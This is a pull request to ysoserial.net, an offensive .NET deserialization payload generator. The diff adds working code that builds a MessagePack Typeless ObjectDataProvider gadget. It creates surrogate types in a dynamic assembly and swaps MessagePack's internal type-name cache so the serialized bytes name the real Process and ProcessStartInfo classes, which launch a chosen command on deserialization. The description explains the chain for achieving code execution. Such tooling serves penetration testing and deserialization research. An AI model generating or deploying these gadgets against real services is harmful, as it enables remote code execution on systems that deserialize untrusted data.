### PR TITLE
Added ObjectDataProvider gadget generation for MessagePack (Typeless)

### DIFF
--- a/ysoserial/App.config
+++ b/ysoserial/App.config
@@ -1,7 +1,7 @@
 ﻿<?xml version="1.0" encoding="utf-8"?>
 <configuration>
   <startup>
-    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
+    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
   </startup>
   <runtime>
     <!-- This will cause an error if DEVPATH cannot be set in the environment variable -->
@@ -12,6 +12,18 @@
       <dependentAssembly>
         <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
         <bindingRedirect oldVersion="0.0.0.0-12.0.0.0" newVersion="12.0.0.0" />
+      </dependentAssembly>
+      <dependentAssembly>
+        <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
+        <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
+      </dependentAssembly>
+      <dependentAssembly>
+        <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />
+        <bindingRedirect oldVersion="0.0.0.0-4.0.1.2" newVersion="4.0.1.2" />
+      </dependentAssembly>
+      <dependentAssembly>
+        <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />
+        <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />
       </dependentAssembly>
     </assemblyBinding>
   </runtime>

--- a/ysoserial/Generators/ObjectDataProviderGenerator.cs
+++ b/ysoserial/Generators/ObjectDataProviderGenerator.cs
@@ -32,7 +32,7 @@ namespace ysoserial.Generators
 
         public override List<string> SupportedFormatters()
         {
-            return new List<string> { "Xaml (4)", "Json.Net", "FastJson", "JavaScriptSerializer", "XmlSerializer (2)", "DataContractSerializer (2)", "YamlDotNet < 5.0.0", "FsPickler", "SharpSerializerBinary", "SharpSerializerXml" };
+            return new List<string> { "Xaml (4)", "Json.Net", "FastJson", "JavaScriptSerializer", "XmlSerializer (2)", "DataContractSerializer (2)", "YamlDotNet < 5.0.0", "FsPickler", "SharpSerializerBinary", "SharpSerializerXml", "MessagePackTypeless", "MessagePackTypelessLz4" };
         }
 
         public override OptionSet Options()
@@ -637,7 +637,7 @@ namespace ysoserial.Generators
                 psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict);
                 Process p = new Process();
                 p.StartInfo = psi;
-                
+
                 ObjectDataProvider odp = new ObjectDataProvider();
                 odp.MethodName = "Start";
                 odp.IsInitialLoadEnabled = false;
@@ -662,7 +662,7 @@ namespace ysoserial.Generators
                 {
                     ourExcludedProperties = psi.GetType().GetProperties().Where(x => !x.Name.Equals("FileName") && !x.Name.Equals("Arguments")).Select(item => item.Name).ToList();
                 }
-                    
+
                 exclusionList = new KeyValuePair<Type, List<String>>(psi.GetType(), ourExcludedProperties);
                 allExclusions.Add(exclusionList);
 
@@ -703,7 +703,38 @@ namespace ysoserial.Generators
                         catch { }
                     }
                     return serializedData;
-                } 
+                }
+            }
+            else if (formatter.ToLowerInvariant().Equals("messagepacktypeless") || formatter.ToLowerInvariant().Equals("messagepacktypelesslz4"))
+            {
+                if (formatter.ToLowerInvariant().Equals("messagepacktypeless"))
+                {
+                    var serializedData = MessagePackObjectDataProviderHelper.CreateObjectDataProviderGadget(inputArgs.CmdFileName, inputArgs.CmdArguments, false);
+
+                    if (inputArgs.Test)
+                    {
+                        try
+                        {
+                            MessagePackObjectDataProviderHelper.Test(serializedData, false);
+                        }
+                        catch { }
+                    }
+                    return serializedData;
+                }
+                else // LZ4
+                {
+                    var serializedData = MessagePackObjectDataProviderHelper.CreateObjectDataProviderGadget(inputArgs.CmdFileName, inputArgs.CmdArguments, true);
+
+                    if (inputArgs.Test)
+                    {
+                        try
+                        {
+                            MessagePackObjectDataProviderHelper.Test(serializedData, true);
+                        }
+                        catch { }
+                    }
+                    return serializedData;
+                }
             }
             else
             {

--- a/ysoserial/Helpers/MessagePackObjectDataProviderHelper.cs
+++ b/ysoserial/Helpers/MessagePackObjectDataProviderHelper.cs
@@ -1,0 +1,186 @@
+﻿namespace ysoserial.Helpers
+{
+    using System;
+    using System.Reflection;
+
+    using MessagePack;
+    using MessagePack.Formatters;
+    using MessagePack.Resolvers;
+
+    using System.Reflection.Emit;
+    using System.Runtime.CompilerServices;
+    using System.Collections.Generic;
+
+    /// <summary>
+    /// Helper methods for generating an ObjectDataProvider gadget with MessagePack (Typeless)
+    /// </summary>
+    internal static class MessagePackObjectDataProviderHelper
+    {
+        /// <summary>
+        /// Creates a serialized ObjectDataProvider gadget that when deserialized will execute the specified command.
+        /// </summary>
+        /// <param name="pCmdFileName">The command filename.</param>
+        /// <param name="pCmdArguments">The command arguments.</param>
+        /// <param name="pUseLz4">Flag to use Lz4 compression. This works with both Lz4Block and Lz4BlockArray.</param>
+        /// <returns>The serialized byte array.</returns>
+        internal static byte[] CreateObjectDataProviderGadget(string pCmdFileName, string pCmdArguments, bool pUseLz4)
+        {
+            CreateDynamicGadgetSurrogateTypes(out Type odpType, out Type procType, out Type psiType);
+
+            SwapTypeCacheNames(
+                new Dictionary<Type, string>
+                {
+                    { odpType, "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" },
+                    { procType, "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" },
+                    { psiType, "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" }
+                });
+
+            var odpInstance = CreateObjectDataProviderSurrogateInstance(odpType, procType, psiType, pCmdFileName, pCmdArguments);
+
+            MessagePackSerializerOptions options = pUseLz4
+                ? TypelessContractlessStandardResolver.Options.WithCompression(MessagePackCompression.Lz4BlockArray)
+                : TypelessContractlessStandardResolver.Options;
+
+            return MessagePackSerializer.Serialize(odpInstance, options);
+        }
+
+        /// <summary>
+        /// Tests the deserialization of a serialized object.
+        /// </summary>
+        /// <param name="pSerializedData">The serialized data.</param>
+        /// <param name="pUseLz4">Flag to use Lz4 compression. This works with both Lz4Block and Lz4BlockArray.</param>
+        internal static void Test(byte[] pSerializedData, bool pUseLz4)
+        {
+            MessagePackSerializerOptions options = pUseLz4
+                ? TypelessContractlessStandardResolver.Options.WithCompression(MessagePackCompression.Lz4BlockArray)
+                : TypelessContractlessStandardResolver.Options;
+
+            MessagePackSerializer.Deserialize<object>(pSerializedData, options);
+        }
+
+        /// <summary>
+        /// Utilizes reflection to add values to the internal FullTypeNameCache that MessagePack uses to acquire cached type names for serialization.
+        /// This allows us to swap our surrogate ObjectDataProvider gadget type information with the real gadget AQNs when serialized.
+        /// </summary>
+        /// <param name="pNewTypeCacheEntries">
+        /// The dictionary of type name cache entries to swap. 
+        ///     Key = The type that the serializer has found.
+        ///     Value = The real gadget type AQN string which we want to use instead of the surrogate type AQN.
+        /// </param>
+        private static void SwapTypeCacheNames(IDictionary<Type, string> pNewTypeCacheEntries)
+        {
+            FieldInfo typeNameCacheField = typeof(TypelessFormatter).GetField("FullTypeNameCache", BindingFlags.NonPublic | BindingFlags.Static);
+            object typeNameCache = typeNameCacheField.GetValue(TypelessFormatter.Instance);
+
+            MethodInfo method = typeNameCacheField.FieldType.GetMethod("TryAdd", new[] { typeof(Type), typeof(byte[]) });
+
+            foreach (var typeSwap in pNewTypeCacheEntries)
+            {
+                method.Invoke(typeNameCache,
+                    new object[]
+                    {
+                        typeSwap.Key,
+                        System.Text.Encoding.UTF8.GetBytes(typeSwap.Value)
+                    });
+            }
+        }
+
+        /// <summary>
+        /// Creates the dynamic types that will be used in the ObjectDataProvider surrogate object graph.
+        /// </summary>
+        /// <param name="pOdpTypeId">The type of the ObjectDataProvider surrogate.</param>
+        /// <param name="pProcTypeId">The type of the Process surrogate.</param>
+        /// <param name="pPsiTypeId">The type of the ProcessStartInfo surrogate.</param>
+        private static void CreateDynamicGadgetSurrogateTypes(out Type pOdpType, out Type pProcType, out Type pPsiType)
+        {
+            AssemblyBuilder gadgetSurrogateAssembly = AssemblyBuilder.DefineDynamicAssembly(new AssemblyName("GadgetSurrogateAssembly"), AssemblyBuilderAccess.Run);
+
+            ModuleBuilder procModBuilder = gadgetSurrogateAssembly.DefineDynamicModule("ProcessModule");
+            ModuleBuilder odpModBuilder = gadgetSurrogateAssembly.DefineDynamicModule("ObjectDataProviderModule");
+
+            TypeBuilder psiTypeBuilder = procModBuilder.DefineType("ProcessStartInfo", TypeAttributes.Public | TypeAttributes.Class);
+            DefineGetSetProperty(psiTypeBuilder, "FileName", typeof(string));
+            DefineGetSetProperty(psiTypeBuilder, "Arguments", typeof(string));
+
+            TypeBuilder procTypeBuilder = procModBuilder.DefineType("Process", TypeAttributes.Public | TypeAttributes.Class);
+            DefineGetSetProperty(procTypeBuilder, "StartInfo", procModBuilder.GetType("ProcessStartInfo"));
+
+            TypeBuilder odpTypeBuilder = odpModBuilder.DefineType("ObjectDataProvider", TypeAttributes.Public | TypeAttributes.Class);
+            DefineGetSetProperty(odpTypeBuilder, "MethodName", typeof(string));
+            DefineGetSetProperty(odpTypeBuilder, "ObjectInstance", typeof(object));
+
+            pOdpType = odpTypeBuilder.CreateType();
+            pProcType = procTypeBuilder.CreateType();
+            pPsiType = psiTypeBuilder.CreateType();
+        }
+
+        /// <summary>
+        /// Creates a populated surrogate ObjectDataProvider instance which matches the object graph of the real ObjectDataProvider gadget.
+        /// </summary>
+        /// <param name="pOdpType">The type of the ObjectDataProvider surrogate.</param>
+        /// <param name="pProcType">The type of the Process surrogate.</param>
+        /// <param name="pPsiType">The type of the ProcessStartInfo surrogate.</param>
+        /// <param name="pCmdFileName">The command filename.</param>
+        /// <param name="pCmdArguments">The command arguments.</param>
+        /// <returns>The full ObjectDataProvider surrogate object graph.</returns>
+        private static object CreateObjectDataProviderSurrogateInstance(Type pOdpType, Type pProcType, Type pPsiType, string pCmdFileName, string pCmdArguments)
+        {
+            object psiInstance = Activator.CreateInstance(pPsiType);
+            pPsiType.GetProperty("FileName").SetValue(psiInstance, pCmdFileName);
+            pPsiType.GetProperty("Arguments").SetValue(psiInstance, pCmdArguments);
+
+            object procInstance = Activator.CreateInstance(pProcType);
+            pProcType.GetProperty("StartInfo").SetValue(procInstance, psiInstance);
+
+            object odpInstance = Activator.CreateInstance(pOdpType);
+            pOdpType.GetProperty("MethodName").SetValue(odpInstance, "Start");
+            pOdpType.GetProperty("ObjectInstance").SetValue(odpInstance, procInstance);
+
+            return odpInstance;
+        }
+
+        /// <summary>
+        /// Helper method for generating a basic Get/Set property with a backing field.
+        /// Note: The CompilerGeneratedAttribute is set to prevent MessagePack from serializing the backing fields.
+        /// </summary>
+        /// <param name="pTypeBuilder">The type builder.</param>
+        /// <param name="pPropertyName">The name of the property.</param>
+        /// <param name="pPropertyType">The type of the property.</param>
+        private static void DefineGetSetProperty(TypeBuilder pTypeBuilder, string pPropertyName, Type pPropertyType)
+        {
+            PropertyBuilder propBuilder = pTypeBuilder.DefineProperty(pPropertyName, PropertyAttributes.None, pPropertyType, null);
+
+            FieldBuilder fieldBuilder = pTypeBuilder.DefineField("_" + pPropertyName, pPropertyType, FieldAttributes.Private);
+            CustomAttributeBuilder attrBuilder = new CustomAttributeBuilder(typeof(CompilerGeneratedAttribute).GetConstructor(Type.EmptyTypes), new object[0]);
+            fieldBuilder.SetCustomAttribute(attrBuilder);
+
+            MethodBuilder getMethodBuilder = pTypeBuilder.DefineMethod(
+                "get_" + pPropertyName,
+                MethodAttributes.Public | MethodAttributes.SpecialName | MethodAttributes.HideBySig,
+                pPropertyType,
+                Type.EmptyTypes
+            );
+
+            ILGenerator getMethodIL = getMethodBuilder.GetILGenerator();
+            getMethodIL.Emit(OpCodes.Ldarg_0);
+            getMethodIL.Emit(OpCodes.Ldfld, fieldBuilder);
+            getMethodIL.Emit(OpCodes.Ret);
+
+            MethodBuilder setMethodBuilder = pTypeBuilder.DefineMethod(
+                "set_" + pPropertyName,
+                MethodAttributes.Public | MethodAttributes.SpecialName | MethodAttributes.HideBySig,
+                null,
+                new Type[] { pPropertyType }
+            );
+
+            ILGenerator setMethodIL = setMethodBuilder.GetILGenerator();
+            setMethodIL.Emit(OpCodes.Ldarg_0);
+            setMethodIL.Emit(OpCodes.Ldarg_1);
+            setMethodIL.Emit(OpCodes.Stfld, fieldBuilder);
+            setMethodIL.Emit(OpCodes.Ret);
+
+            propBuilder.SetGetMethod(getMethodBuilder);
+            propBuilder.SetSetMethod(setMethodBuilder);
+        }
+    }
+}

--- a/ysoserial/Helpers/SerializersHelper.cs
+++ b/ysoserial/Helpers/SerializersHelper.cs
@@ -1,4 +1,6 @@
-﻿using Newtonsoft.Json;
+﻿using MessagePack;
+using MessagePack.Resolvers;
+using Newtonsoft.Json;
 using Polenter.Serialization;
 using System;
 using System.Collections.Generic;
@@ -160,6 +162,26 @@ namespace ysoserial.Helpers
             {
                 Console.WriteLine("\tError in SharpSerializer (XML)!");
             }
+
+            try
+            {
+                Console.WriteLine("\n~~MessagePackTypeless:~~\n");
+                Console.WriteLine(MessagePackTypeless_serialize_ToBase64(myobj));
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine("\tError in MessagePackTypeless!");
+            }
+
+            try
+            {
+                Console.WriteLine("\n~~MessagePackTypeless (Lz4):~~\n");
+                Console.WriteLine(MessagePackTypeless_Lz4_serialize_ToBase64(myobj));
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine("\tError in MessagePackTypeless (Lz4)!");
+            }
         }
 
         public static void TestAll(object myobj)
@@ -228,6 +250,14 @@ namespace ysoserial.Helpers
             if (SharpSerializer_Xml_test(myobj) != null)
             {
                 sb.AppendLine("SharpSerializer_ObjectDataProvider_Xml_test");
+            }
+            if (MessagePackTypeless_test(myobj) != null)
+            {
+                sb.AppendLine("MessagePackTypeless_test");
+            }
+            if (MessagePackTypelessLz4_test(myobj) != null)
+            {
+                sb.AppendLine("MessagePackTypelessLz4_test");
             }
             Console.WriteLine(sb);
         }
@@ -467,7 +497,7 @@ namespace ysoserial.Helpers
             return obj;
         }
 
-        
+
 
         public static object Xaml_test(object myobj)
         {
@@ -493,7 +523,7 @@ namespace ysoserial.Helpers
             {
                 System.Windows.Markup.XamlWriter.Save(myobj, writer);
             }
-            
+
             string text = sb.ToString();
             return text;
         }
@@ -644,7 +674,7 @@ namespace ysoserial.Helpers
 
         public static string BinaryFormatter_serialize_ToBase64(object myobj)
         {
-            return Convert.ToBase64String(BinaryFormatter_serialize_ToMemoryStream(myobj).ToArray()); 
+            return Convert.ToBase64String(BinaryFormatter_serialize_ToMemoryStream(myobj).ToArray());
         }
 
         public static byte[] BinaryFormatter_serialize_ToByteArray(object myobj)
@@ -981,6 +1011,48 @@ namespace ysoserial.Helpers
             }
         }
 
+        private static string MessagePackTypeless_serialize_ToBase64(object myobj)
+        {
+            MessagePackSerializerOptions options = TypelessContractlessStandardResolver.Options;
+            var serialized = MessagePackSerializer.Serialize(myobj, options);
+            return Convert.ToBase64String(serialized);
+        }
 
+        private static string MessagePackTypeless_Lz4_serialize_ToBase64(object myobj)
+        {
+            MessagePackSerializerOptions options = TypelessContractlessStandardResolver.Options.WithCompression(MessagePackCompression.Lz4BlockArray);
+            var serialized = MessagePackSerializer.Serialize(myobj, options);
+            return Convert.ToBase64String(serialized);
+        }
+
+        public static object MessagePackTypeless_test(object myobj)
+        {
+            try
+            {
+                MessagePackSerializerOptions options = TypelessContractlessStandardResolver.Options;
+                var serialized = MessagePackSerializer.Serialize(myobj, options);
+                return MessagePackSerializer.Deserialize<object>(serialized, options);
+            }
+            catch (Exception e)
+            {
+                //ignore
+                return null;
+            }
+        }
+
+        public static object MessagePackTypelessLz4_test(object myobj)
+        {
+            try
+            {
+                MessagePackSerializerOptions options = TypelessContractlessStandardResolver.Options.WithCompression(MessagePackCompression.Lz4BlockArray);
+                var serialized = MessagePackSerializer.Serialize(myobj, options);
+                return MessagePackSerializer.Deserialize<object>(serialized, options);
+            }
+            catch (Exception e)
+            {
+                //ignore
+                return null;
+            }
+        }
     }
 }

--- a/ysoserial/packages.config
+++ b/ysoserial/packages.config
@@ -5,9 +5,21 @@
   <package id="FsPickler" version="4.6" targetFramework="net452" />
   <package id="FsPickler.CSharp" version="4.6" targetFramework="net452" />
   <package id="FsPickler.Json" version="4.6" targetFramework="net452" />
+  <package id="MessagePack" version="2.5.94" targetFramework="net472" />
+  <package id="MessagePack.Annotations" version="2.5.94" targetFramework="net472" />
+  <package id="Microsoft.Bcl.AsyncInterfaces" version="6.0.0" targetFramework="net472" />
   <package id="Microsoft.IdentityModel" version="7.0.0" targetFramework="net452" />
+  <package id="Microsoft.NET.StringTools" version="17.4.0" targetFramework="net472" />
   <package id="NDesk.Options" version="0.2.1" targetFramework="net452" />
   <package id="Newtonsoft.Json" version="12.0.3" targetFramework="net452" />
   <package id="SharpSerializer" version="3.0.1" targetFramework="net452" />
+  <package id="System.Buffers" version="4.5.1" targetFramework="net472" />
+  <package id="System.Collections.Immutable" version="6.0.0" targetFramework="net472" />
+  <package id="System.Memory" version="4.5.5" targetFramework="net472" />
+  <package id="System.Numerics.Vectors" version="4.5.0" targetFramework="net472" />
+  <package id="System.Reflection.Emit" version="4.7.0" targetFramework="net472" />
+  <package id="System.Reflection.Emit.Lightweight" version="4.7.0" targetFramework="net472" />
+  <package id="System.Runtime.CompilerServices.Unsafe" version="6.0.0" targetFramework="net472" />
+  <package id="System.Threading.Tasks.Extensions" version="4.5.4" targetFramework="net472" />
   <package id="YamlDotNet" version="4.3.2" targetFramework="net452" />
 </packages>

--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -9,7 +9,7 @@
     <AppDesignerFolder>Properties</AppDesignerFolder>
     <RootNamespace>ysoserial</RootNamespace>
     <AssemblyName>ysoserial</AssemblyName>
-    <TargetFrameworkVersion>v4.5.2</TargetFrameworkVersion>
+    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
     <FileAlignment>512</FileAlignment>
     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
     <TargetFrameworkProfile />
@@ -109,9 +109,21 @@
       <HintPath>..\packages\FsPickler.Json.4.6\lib\net45\FsPickler.Json.dll</HintPath>
       <Private>True</Private>
     </Reference>
+    <Reference Include="MessagePack, Version=2.5.0.0, Culture=neutral, PublicKeyToken=b4a0369545f0a1be, processorArchitecture=MSIL">
+      <HintPath>..\packages\MessagePack.2.5.94\lib\netstandard2.0\MessagePack.dll</HintPath>
+    </Reference>
+    <Reference Include="MessagePack.Annotations, Version=2.5.0.0, Culture=neutral, PublicKeyToken=b4a0369545f0a1be, processorArchitecture=MSIL">
+      <HintPath>..\packages\MessagePack.Annotations.2.5.94\lib\netstandard2.0\MessagePack.Annotations.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Bcl.AsyncInterfaces, Version=6.0.0.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Bcl.AsyncInterfaces.6.0.0\lib\net461\Microsoft.Bcl.AsyncInterfaces.dll</HintPath>
+    </Reference>
     <Reference Include="microsoft.identitymodel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
       <HintPath>..\packages\Microsoft.IdentityModel.7.0.0\lib\net35\microsoft.identitymodel.dll</HintPath>
       <Private>True</Private>
+    </Reference>
+    <Reference Include="Microsoft.NET.StringTools, Version=1.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.NET.StringTools.17.4.0\lib\net472\Microsoft.NET.StringTools.dll</HintPath>
     </Reference>
     <Reference Include="NDesk.Options, Version=0.2.1.0, Culture=neutral, processorArchitecture=MSIL">
       <HintPath>..\packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll</HintPath>
@@ -126,6 +138,12 @@
     </Reference>
     <Reference Include="PresentationFramework" />
     <Reference Include="System" />
+    <Reference Include="System.Buffers, Version=4.0.3.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Buffers.4.5.1\lib\net461\System.Buffers.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Collections.Immutable, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Collections.Immutable.6.0.0\lib\net461\System.Collections.Immutable.dll</HintPath>
+    </Reference>
     <Reference Include="System.configuration" />
     <Reference Include="System.Core" />
     <Reference Include="System.Drawing" />
@@ -135,9 +153,22 @@
       <SpecificVersion>False</SpecificVersion>
       <HintPath>dlls\Microsoft.PowerShell.Editor.dll</HintPath>
     </Reference>
+    <Reference Include="System.Memory, Version=4.0.1.2, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Memory.4.5.5\lib\net461\System.Memory.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Numerics" />
+    <Reference Include="System.Numerics.Vectors, Version=4.1.4.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Numerics.Vectors.4.5.0\lib\net46\System.Numerics.Vectors.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Runtime.CompilerServices.Unsafe, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Runtime.CompilerServices.Unsafe.6.0.0\lib\net461\System.Runtime.CompilerServices.Unsafe.dll</HintPath>
+    </Reference>
     <Reference Include="System.Runtime.Remoting" />
     <Reference Include="System.Runtime.Serialization" />
     <Reference Include="System.Runtime.Serialization.Formatters.Soap" />
+    <Reference Include="System.Threading.Tasks.Extensions, Version=4.2.0.1, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Threading.Tasks.Extensions.4.5.4\lib\net461\System.Threading.Tasks.Extensions.dll</HintPath>
+    </Reference>
     <Reference Include="System.Transactions" />
     <Reference Include="System.Web" />
     <Reference Include="System.Web.Extensions" />
@@ -171,6 +202,7 @@
     <Compile Include="Generators\ToolboxItemContainerGenerator.cs" />
     <Compile Include="Generators\WindowsPrincipalGenerator.cs" />
     <Compile Include="Helpers\LocalCodeCompiler.cs" />
+    <Compile Include="Helpers\MessagePackObjectDataProviderHelper.cs" />
     <Compile Include="Helpers\ModifiedVulnerableBinaryFormatters\AdvancedBinaryFormatterParser.cs" />
     <Compile Include="Helpers\ModifiedVulnerableBinaryFormatters\binarycommonclasses.cs" />
     <Compile Include="Helpers\ModifiedVulnerableBinaryFormatters\binaryconverter.cs" />


### PR DESCRIPTION
MessagePack when in 'Typeless' mode (using the TypelessContractlessStandardResolver) will serialize type information along with the data. It uses property setters to initialize the objects it's deserializing. This allows use of the ObjectDataProvider gadget to achieve code execution.

The approach I've used is somewhat odd, but is due to some limitations of being able to control the properties that are serialized. There doesn't appear to be a mechanism to exclude properties (or even private fields) from serialization when using Typeless mode, so my approach is to create a surrogate object graph of the ObjectDataProvider in a dynamic assembly, then use reflection to modify MessagePack's internal type cache so that the surrogate objects are serialized with the real AssemblyQualifiedNames of ObjectDataProvider, Process and ProcessStartInfo.

When deserializing this object graph it acts on the real ObjectDataProvider gadget and deserializes into a code execution scenario.